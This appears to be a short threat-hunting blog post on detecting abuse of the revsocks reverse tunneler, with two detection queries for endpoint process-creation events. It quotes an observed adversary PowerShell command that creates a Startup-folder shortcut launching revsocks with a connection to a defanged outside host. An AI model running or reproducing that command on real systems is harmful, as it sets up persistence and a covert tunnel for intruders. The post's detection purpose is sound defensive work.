178. Hunting for Another Tunneler: Revsocks
Hello everyone!
Tunnelers are everywhere! And this one becoming more and more popular among threat actors. Revsocks. Let's look at how this tool is abused in-the-wild.
Here's an example. The adversary abused PowerShell to create a shortcut in the Startup folder and execute revsocks:
powershell -Command "$s = (New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m4.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Microsoft\Windows\m4.exe'; $s.Arguments = '-connect hxxps://metallurgify[.]com:16443 -tls -pass 1488 -ws'; $s.WorkingDirectory = 'C:\Users\user\AppData\Local\Microsoft\Windows'; $s.Save();"
So, the first hunting idea is to search for creating shortcuts with PowerShell:
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: "createshortcut"
Another one - hunting for revsocks-related command line arguments:
event_type: "processcreatewin"
AND
cmdline: ("connect" AND "pass")
See you tomorrow!
Comments
Post a Comment